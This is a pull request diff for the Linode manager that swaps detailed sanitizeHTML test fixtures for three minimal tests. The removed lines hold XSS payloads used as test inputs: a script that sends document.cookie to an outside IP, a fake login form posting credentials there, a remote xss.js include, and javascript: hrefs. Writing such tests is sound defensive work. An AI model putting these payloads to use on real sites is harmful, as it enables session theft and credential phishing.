### PR TITLE
Basic sanity tests for sanitizeHTML

### DIFF
--- a/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
+++ b/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
@@ -1,56 +1,17 @@
 import { isURLValid, sanitizeHTML } from './sanitizeHTML';
 
-/** not allowed */
-const script = '<script src=""></script>';
-const script2 = `<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>`;
-const xhrScript = `<script>
-  var xhr = new XMLHttpRequest();
-  xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
-  xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
-  xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
-  </script>`;
-const aClick = '<a onClick="() => console.log("hello world")"></a>';
-const aClickLang =
-  '<a lang="en-us" onClick="() => console.log("hello world")"></a>';
-const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br></form></h3>`;
-const aScript = `<a href="javascript:alert(8007)">Click me</a>`;
-const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script src="http://192.168.149.128/xss.js">`;
+describe('sanitizeHTML', () => {
+  it('should escape non-whitelisted tags', () => {
+    expect(sanitizeHTML('<script>')).not.toContain('<script>');
+  });
 
-/** allowed */
-const a = '<a href="helloworld.com">Hello world</a>';
-const aLang = '<a lang="en-us"></a>';
+  it('should strip non-whitelisted attributes', () => {
+    expect(sanitizeHTML('<a onmouseover>')).not.toContain('onmouseover');
+  });
 
-it('should escape script tags, retain child text, and strip attributes', () => {
-  expect(sanitizeHTML(script)).toBe('&lt;script&gt;&lt;/script&gt;');
-  expect(sanitizeHTML(script2)).toBe(
-    '&lt;script&gt;new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;&lt;/script&gt;'
-  );
-  expect(sanitizeHTML(xhrScript)).toBe(
-    `&lt;script&gt;
-  var xhr = new XMLHttpRequest();
-  xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
-  xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
-  xhr.send('txtName=xss&amp;mtxMessage=xss&amp;btnSign=Sign+Guestbook');
-  &lt;/script&gt;`
-  );
-});
-
-it('should escape unwanted blacklisted tags', () => {
-  expect(sanitizeHTML(login)).not.toMatch(/<form|<input/);
-  expect(sanitizeHTML(aScript)).toBe(`<span>Click me</span>`);
-});
-
-it('should not allow query string attacks', () => {
-  expect(sanitizeHTML(queryString)).toBe(
-    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;script&gt;&lt;/script&gt;'
-  );
-});
-
-it('should only allow whitelisted HTML attributes', () => {
-  expect(sanitizeHTML(aClick)).toBe('<a></a>');
-  expect(sanitizeHTML(aLang)).toBe(aLang);
-  expect(sanitizeHTML(aClickLang)).toBe(aLang);
-  expect(sanitizeHTML(a)).toBe(a);
+  it('should transform <a /> tags to spans if the href is invalid', () => {
+    expect(sanitizeHTML('<a href="javascript:void"/>')).toContain('<span>');
+  });
 });
 
 describe('isURLValid', () => {

--- a/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
+++ b/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
@@ -9,8 +9,8 @@ describe('sanitizeHTML', () => {
     expect(sanitizeHTML('<a onmouseover>')).not.toContain('onmouseover');
   });
 
-  it('should transform <a /> tags to spans if the href is invalid', () => {
-    expect(sanitizeHTML('<a href="javascript:void"/>')).toContain('<span>');
+  it('should strip invalid href values', () => {
+    expect(sanitizeHTML('<a href="javascript:void"/>')).not.toContain('href');
   });
 });
 


### PR DESCRIPTION
## Description

Original discussion here: https://github.com/linode/manager/pull/6227 ... @Jskobos this is pretty much what you suggested. 😆 

I still think it's valuable to have these three tests, which confirm:

- We're escaping non-whitelisted tags.
- We're stripping non-whitelisted attributes.
- We're stripping invalid "href" values.

The specific string tests have been removed, as they are noisy and probably fall in the category of "testing the library". With these basic tests I'm proposing, we verify that sanitization is working, and not much else about implementation.

